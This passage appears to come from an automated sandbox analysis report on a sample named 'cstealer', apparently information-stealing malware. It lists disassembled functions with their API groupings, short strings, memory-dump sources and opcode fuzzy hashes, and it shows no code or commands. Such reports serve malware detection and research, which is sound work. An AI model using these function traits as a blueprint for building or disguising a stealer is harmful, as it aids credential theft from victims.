                                                                                                                                                            • Instruction Fuzzy Hash: 3D81A1316103C18AFB54BBE9A4413D9F2D3BB85BB6F1844259B08577B6EB38C885B790
                                                                                                                                                            Function 0000014E71289DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                            • Instruction ID: ca422ea72b13af2cb593632135e9547a287831bedca556353886fdebb9947838
                                                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                            • Instruction Fuzzy Hash: 2931E531312780D1EF22DB86A4007E4B6D6B788BB2F6909269F1D077F0DF39D0559380
                                                                                                                                                            Function 0000014E71293DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                            • Instruction ID: 1aa93f5abaab6b74eded6f4e74b46d0ef2a397ff28059eb80c4b1362f4119006
                                                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                            • Instruction Fuzzy Hash: 33116D32314B8186E7508B5AE844399B6E1F788FF6F044625EF5A977B4CF38C8149784
                                                                                                                                                            Function 0000014E71282F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                            • String ID: dialer
                                                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                            • Instruction ID: 96fdb32f101d79e0954fc04ddf2fd04eeb2a99bfb01801c590f308f84dfbd4ba
                                                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                            • Instruction Fuzzy Hash: 29319D32701B9183EB14CF96A5407A9F7E2FB54BA6F0844209F4847B76EF34C4A1E380
                                                                                                                                                            Function 0000014E7128CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                            • Instruction ID: 30ed924f9fdae6f10bd022f2da53b65c48ffbd97723172bdc2ce23c4406712fc
                                                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                            • Instruction Fuzzy Hash: E1118C303003D442FB68A3B165413E9F2C37B947F6F144725AB3646BF6DE68C412A380
                                                                                                                                                            Function 0000014E7128199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 517849248-0
                                                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                            • Instruction ID: fe82c0c6f41f647c9aad2e1a40446b8e12027783ce5f043a3070cd7e307fa92f
                                                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                            • Instruction Fuzzy Hash: C3015B71300B8086EB14DB56E448399B3E2F788FD2F484435DF4953764DE38C549C784
                                                                                                                                                            Function 0000014E712836C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 449555515-0
                                                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                            • Instruction ID: 613acb7e71fb28a53e36258562618e046d996cba38d0e1d0002172a6b552a072
                                                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                            • Instruction Fuzzy Hash: FD012D75315B8086EB249B65E848795B3F2BB49BA7F040824CF4917775EF3DC108D784
                                                                                                                                                            Function 0000014E71288FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                            • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                                                            • Instruction ID: ee186761fd281947b45537d140527ae6652558dafecc921b8ffaf79919fc35af
                                                                                                                                                            • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                                                            • Instruction Fuzzy Hash: 9851D3323057808AEF54CF55E848B99B7D7F384BAAF208528DF4653768DB35E841E784
                                                                                                                                                            Function 0000014E7128BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                            • Instruction ID: 0ce47e0e8d0f8edba1b9f6802766db3d122c0766496499b6eed022fd588fbfa7
                                                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                            • Instruction Fuzzy Hash: C9F0627121178481EB108B68E848399B3E2FB84BB2F540619CB6A457F4CF2CC1459784
                                                                                                                                                            Function 0000014E71283044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CombinePath
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                            • Instruction ID: fcf3f87a22714c5af5c7dd3b874ef1164f8a65ec843021e3acb372931e6fbf07
                                                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                            • Instruction Fuzzy Hash: 8CF08230708BC482EA008B57B904199F2E2BB48FE2F084530EF4617B38DF3CC4459748
                                                                                                                                                            Function 0000014E71285710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                            • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                                                            • Instruction ID: 59b4f285aac9e59584851de5800f30632ac4240fb03ada94efefb7bb0b434042
                                                                                                                                                            • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                                                            • Instruction Fuzzy Hash: 4F61C436619B80C6E760DB55E45039AB7F2F3887A6F504116EB8E47BB8DB7CC480DB80
                                                                                                                                                            Function 0000014E71263504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction ID: 3b7b3c2f61e4c674145346ebd926115f83d3f6aa4737f228916995deec1bfdb4
                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction Fuzzy Hash: 54119132A1CBD111FA641529F4413E9B1D37B5D3F6F588629EB6E07FFE8A24C8416280
                                                                                                                                                            Function 0000014E71294104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction ID: cc1465b818a63f9f29368bfd64e07edbab82b2e5aca521e11524367ea61b8342
                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction Fuzzy Hash: 2B117BB2B10BD112F664155CDB653E5B1C37B783BAF180E24A776277F6C624C441A180
                                                                                                                                                            Function 0000014E7125F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                                                            • API String ID: 3215553584-4202648911
                                                                                                                                                            • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                            • Instruction ID: 5c58eaf62982e4e61320bef0ad0a9ad46b6bed5caea801ba4d6ea43779995cc0
                                                                                                                                                            • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                            • Instruction Fuzzy Hash: C16192766003C042FB659B65D5C43EAFAE3F7867A2F548495CB0A577B8FA34C841B290
                                                                                                                                                            Function 0000014E7128AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction ID: 80cf88362f66d50eb35710a0319643d093fab15a29c8e9ca8c2fa1e16ef440d4
                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction Fuzzy Hash: 33617732600B848AEB60DFA5D4803DDB7E2F358BA9F144215EF4A17BA8DF38D595D780
                                                                                                                                                            Function 0000014E7125A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction ID: 21f12910204a0d017a884d9ceef6c09780b78ba4c24cace68260204c25c92d2f
                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction Fuzzy Hash: 535181321003C0CAEBB48B15948639CB7E2F355FAAF188155DB5987BE6EB78D451F780
                                                                                                                                                            Function 0000014E7128AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction ID: 9e4c6edbbce038bc63e31416fd91147808476041fdd0b79cb1016711f7bb55d0
                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction Fuzzy Hash: 65517E721007C08BEBB48F959484399B7E2F764FA6F188125DB9947BE5CF38D4A1E780
                                                                                                                                                            Function 0000014E71258405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                            • Instruction ID: 22c68a5f77055b399960987d092598895625d628c570f0c147858c5222edc83d
                                                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                            • Instruction Fuzzy Hash: EB51BF326013808AEB14CB16E485B98B7E6F350BEAF528164DF06437ACFFB4D840B784
                                                                                                                                                            Function 0000014E712583E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                            • Instruction ID: d929eebe01e5b418bf841035901d9ffcc7534cf5db13c53276420b8497d05def
                                                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                            • Instruction Fuzzy Hash: B5319131201780D6E714DF12E885799BBE6F340BEAF558058EF5A07BA8EF78D940E784
                                                                                                                                                            Function 0000014E71292058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                            • Instruction ID: ed2eb803519f1bc06bdeb02330b1f48eea8d7ae9bd00dd2e28ba8e14c0a590ec
                                                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                            • Instruction Fuzzy Hash: 39D1ED32B14B8089E711CFA9D4403ECBBF2F354BA9F118616CF59A7BA9DA34C406D780
                                                                                                                                                            Function 0000014E712814A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3168794593-0
                                                                                                                                                            • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                                                                                            • Instruction ID: bdb8946b4d7ac3cb23974ad88b6a9fd138db8f5c6a97653da0b9b4872b1a84e7
                                                                                                                                                            • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                                                                                            • Instruction Fuzzy Hash: 90015A72600BD0CAE704DF6AE90418AB7E2F788FD2F044825EB4A63739DE38C051D784
                                                                                                                                                            Function 0000014E71292980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                            • Instruction ID: 46f6457d9876123a546a7debd87d7f87adf4fa0c6881faad424b09b564434291
                                                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                            • Instruction Fuzzy Hash: 9B91C1327007D085F760DF6994903EDBBE6B704BAAF154909DF0A77BA5DA34C486E780
                                                                                                                                                            Function 0000014E71287960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                            • Instruction ID: 09cf2be12a22a259bd116f90fb271d7b589bd3a7da3fd6b96b4029238af35398
                                                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                            • Instruction Fuzzy Hash: 20112736750F818AEB00CF64E8553A973E4F719769F440E21EF6D86BA4DB78C1A89380
                                                                                                                                                            Function 0000014E71259E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction ID: a17d012090d468880c7c3b09e7637509077af34e7b57d4c91239f182ea7e965d
                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction Fuzzy Hash: AD61AD33614B848AEB20CF65D4803DDB7E2F344BA9F144256EF4917BA8EB78D195E780
                                                                                                                                                            Function 0000014E71282330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileType
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                            • Instruction ID: 004833f1f4f2a119707a24a8df89f45ba772eef2ea416a1672463bab5f75a3e3
                                                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                            • Instruction Fuzzy Hash: E451E2322083C181F768DAA9B0583EAF7E3F3857A1F440125DF4A03BAACA39C505E7D0
